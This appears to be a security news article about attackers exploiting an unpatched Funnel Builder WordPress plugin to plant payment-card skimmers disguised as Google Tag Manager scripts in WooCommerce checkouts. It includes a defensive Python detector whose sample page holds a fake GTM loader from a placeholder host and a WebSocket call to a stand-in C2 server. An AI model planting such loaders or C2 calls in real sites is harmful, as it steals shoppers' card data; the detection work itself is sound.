A critical security vulnerability within the **Funnel Builder** WordPress plugin is currently being exploited in the wild to inject malicious JavaScript code into WooCommerce checkout pages. The attackers’ objective is to steal sensitive payment data from unsuspecting customers. The flaw affects all versions of the plugin prior to 3.15.0.3 and impacts over 40,000 WooCommerce stores globally.
Sansec, a Dutch e-commerce security company, detailed the ongoing exploitation this week. The vulnerability, which currently lacks an official CVE identifier, allows unauthenticated attackers to inject arbitrary JavaScript into every checkout page on a compromised store. FunnelKit, the developer of Funnel Builder, has released version 3.15.0.3 with a patch to address this critical security risk.
Funnel Builder Vulnerability Exploited for Payment Data Theft
The attackers are strategically inserting fake Google Tag Manager scripts into the plugin’s “External Scripts” setting. According to Sansec, this injected code closely resembles legitimate analytics tags but secretly loads a payment skimmer. This skimmer is designed to capture crucial information such as credit card numbers, CVVs, and billing addresses entered by customers during the checkout process.
Sansec’s analysis indicates that Funnel Builder contains a publicly accessible checkout endpoint. This endpoint, in older versions, allowed incoming requests to dictate which internal methods to execute without adequately verifying the caller’s permissions or restricting the available methods. This oversight creates a significant security loophole.
Bad actors can exploit this flaw by sending an unauthenticated request to invoke an unspecified internal method. This allows them to write attacker-controlled data directly into the plugin’s global settings. Consequently, the malicious code snippet gets embedded into every checkout page managed by Funnel Builder on the affected website.
The outcome of such an attack is the potential for malicious script tags to be executed with every checkout transaction on a vulnerable WordPress site. In observed incidents, the injected payload has been disguised as a Google Tag Manager loader. This loader fetches JavaScript from a remote domain, establishing a WebSocket connection to an attacker-controlled command-and-control (C2) server.
The primary objective of this malicious operation is to exfiltrate payment card details, CVV codes, and personal billing information provided by customers. Website owners are strongly advised to update their Funnel Builder plugin to the latest version, 3.15.0.3, immediately. Additionally, they should meticulously review the “Settings > Checkout > External Scripts” section for any unfamiliar entries and remove them without delay.
Sansec noted that presenting skimmers as familiar tracking tags like Google Analytics or Tag Manager is a recurring tactic seen in Magecart-style attacks. This approach is effective because administrators often overlook these legitimate-looking scripts, allowing the malicious code to remain undetected.
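The review step Sansec recommends (look for unfamiliar entries in the checkout's external scripts) can be partly automated by fetching a rendered checkout page and flagging scripts that have the shape of a Google Tag Manager loader but load from a host Google does not operate, or that open a WebSocket from inside the checkout. The following Python script is an added example written for this article, not code from Sansec, FunnelKit or the Funnel Builder plugin; the checkout HTML, the `example.invalid` hostnames and the `GTM-EXAMPLE` container id in it are constructed placeholders, and the allowlist of tag hosts is an assumption a store owner would adjust to their own tag setup.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts that legitimately serve Google Tag Manager / Analytics loaders.
# Assumption: extend this with any other tag vendors the store actually uses.
ALLOWED_TAG_HOSTS = {"www.googletagmanager.com", "www.google-analytics.com"}

# Markers present in the genuine GTM bootstrap snippet; a lookalike keeps them.
GTM_MARKERS = ("gtm.start", "gtm.js", "dataLayer")

# Absolute or protocol-relative http(s) URLs; the lookbehind keeps "wss://x"
# from being reported a second time as "//x".
URL_RE = re.compile(r"""(?<![\w:/])(?:https?:)?//[^\s'"<>]+""", re.I)
WS_RE = re.compile(r"""wss?://[^\s'"<>]+""", re.I)


class ScriptCollector(HTMLParser):
    """Collect every <script>: external src values and inline bodies."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def find_suspicious_scripts(html: str) -> list:
    """Return findings for GTM-lookalike loaders on non-allowlisted hosts and
    for WebSocket endpoints embedded in checkout-page scripts."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []

    for src in parser.external:
        host = urlparse(src).netloc.lower()
        if host and host not in ALLOWED_TAG_HOSTS and "gtm" in src.lower():
            findings.append({"reason": "GTM-style loader from non-allowlisted host", "value": src})

    for body in parser.inline:
        looks_like_gtm = any(marker in body for marker in GTM_MARKERS)
        if looks_like_gtm:
            for url in URL_RE.findall(body):
                host = urlparse(url).netloc.lower()
                if host and host not in ALLOWED_TAG_HOSTS:
                    findings.append({"reason": "GTM-style loader from non-allowlisted host", "value": url})
        for url in WS_RE.findall(body):
            findings.append({"reason": "WebSocket endpoint in checkout script", "value": url})
    return findings


# Constructed checkout page: one genuine-looking GTM snippet, one lookalike that
# loads from a placeholder attacker host, one placeholder skimmer opening a WebSocket.
SAMPLE_CHECKOUT_HTML = """
<html><head>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});
var f=d.getElementsByTagName(s)[0],j=d.createElement(s);j.async=true;
j.src='https://www.googletagmanager.com/gtm.js?id='+i;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-EXAMPLE');</script>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});
var f=d.getElementsByTagName(s)[0],j=d.createElement(s);j.async=true;
j.src='https://tagmanager-cdn.example.invalid/gtm.js?id='+i;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-EXAMPLE');</script>
<script>var ws=new WebSocket('wss://c2.example.invalid/socket');</script>
<script src="https://store.example.invalid/wp-content/themes/storetheme/checkout.js"></script>
</head><body>checkout</body></html>
"""

if __name__ == "__main__":
    for finding in find_suspicious_scripts(SAMPLE_CHECKOUT_HTML):
        print(f"{finding['reason']}: {finding['value']}")
```

Run it against the HTML of a real checkout page fetched as an anonymous visitor, since the injected code is served to every customer; the store's own theme script is left alone because it neither resembles a GTM loader nor opens a WebSocket, while the lookalike loader and the WebSocket endpoint are reported for manual review in the plugin's external scripts setting.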
Broader Context of Web Application Exploitation
This disclosure follows recent reports from Sucuri highlighting a campaign targeting Joomla websites. In that instance, attackers were injecting heavily obfuscated PHP code to create backdoors, enabling communication with attacker-controlled C2 servers. The compromised sites were then used to serve spammy content to visitors and search engines, leveraging the website’s reputation for malicious purposes.
“The script acts as a remote loader,” security researcher Puja Srivastava stated in relation to the Joomla compromise. “It contacts an external server, sends information about the infected website, and waits for instructions. The response from the remote server determines what content the infected site should serve.” This method allows attackers to dynamically alter the compromised website’s behavior without needing to modify local files repeatedly, enabling them to inject spam links, redirect visitors, or display malicious pages on demand.
The ongoing exploitation of the Funnel Builder plugin underscores the persistent threat landscape for e-commerce platforms. Website owners must remain vigilant, implement robust security practices, and ensure all plugins and themes are kept up to date to mitigate such risks. Further monitoring by security firms will likely focus on identifying new variations of this attack or other vulnerabilities that may emerge within popular WordPress plugins.